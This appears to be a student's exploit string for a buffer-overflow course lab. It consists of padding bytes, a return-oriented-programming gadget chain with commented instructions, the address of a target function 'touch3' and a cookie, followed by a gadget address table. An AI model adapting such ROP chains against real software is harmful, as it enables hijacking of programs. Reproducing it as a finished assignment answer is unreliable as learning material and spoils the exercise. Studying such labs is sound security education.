/* note there are one extra space on both end of the comment region */

01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01                 /* stack stuff                       */

ad 1a 40 00 00 00 00 00                 /* gadget1: movq %rsp, %rax          */
c5 19 40 00 00 00 00 00                 /* gadget2: movq %rax, %rdi          */
ab 19 40 00 00 00 00 00                 /* gadget3: popq %rax                */
48 00 00 00 00 00 00 00                 /* cookie address stack offset: 9*8  */
dd 19 40 00 00 00 00 00                 /* gadget4: movl  %eax,%edx          */
34 1a 40 00 00 00 00 00                 /* gadget5: movl  %edx,%ecx          */
13 1a 40 00 00 00 00 00                 /* gadget6: movl  %ecx,%esi          */
d6 19 40 00 00 00 00 00                 /* gadget7: lea   (%rdi,%rsi,1),%rax */ /* not included in pdf but indeed in rtarget, hence generate youself */
c5 19 40 00 00 00 00 00                 /* gadget8: movq  %rax, %rdi         */      
fa 18 40 00 00 00 00 00                 /* touch3 start address              */
35 39 62 39 39 37 66 61                 /* cookie                            */



/*    instructions below we will use                                          */
/*    address      --   code             -- instructions                      */
/*    0x4019ab     --   58 (90) c3       -- popq %rax                         */
/*    0x4019ac     --   58 (90) c3       -- popq %rax                         */
/*    0x4019c5     --   48 89 c7 (90) c3 -- mov %rax,%rdi                     */
/*    0x4019dd     --   89 c2 (90) c3    -- movl %eax,%edx                    */
/*    0x401a34     --   89 d1 (38 c9) c3 -- movl %edx,%ecx                    */
/*    0x401aad     --   48 89 e0 (90) c3 -- mov %rsp,%rax                     */
/*    0x401a27     --   89 ce (38 c0) c3 -- movl %ecx,%esi                    */
/*    0x401a13     --   89 ce (90 90) c3 -- movl %ecx,%esi                    */
/*    0x401a34     --   89 d1 (38 c9) c3 -- movl %edx,%ecx                    */
/*    0x4019d6     --   48 8d 04 37 c3   -- lea (%rdi,%rsi,1),%rax            */